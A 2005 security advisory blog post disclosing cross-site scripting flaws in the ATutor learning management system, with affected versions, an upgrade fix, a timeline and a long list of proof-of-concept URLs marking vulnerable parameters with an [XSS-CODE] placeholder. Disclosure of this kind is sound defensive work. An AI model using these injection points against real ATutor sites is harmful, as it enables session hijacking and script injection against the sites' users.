ATutor multiple variable Cross site scripting

Wednesday, June 15, 2005
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORE:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
OSVDB ID:17351,17352,17353,17354,17355
17356,17357,17358,17359.
Secunia: SA15705
Securitytracker: 1014216
BID: 13972
################################################

ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.

ATutor contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. script.This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


###########
versions:
###########

ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
ATutor 1.5 RC 2 vulnerable
Atutor 1.5 RC 3 not tested

#############
solution
#############

Upgrade to version ATutor 1.5RC3 or higher, as it has been
reported to fix this vulnerability. An upgrade is required
as there are no known workarounds.


##############
timeline
##############

discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
vendor response: 27-06-2005
disclosure: 16-06-2005


##################
Proof of concepts
##################

http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]

http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]

http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]

http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]

http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search

http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results

http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search

http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search

http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]

for exploting some flaws , need a client login.
Others scripts and others variables are vulnerable
to the same style attack.


############### €nd ##############

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...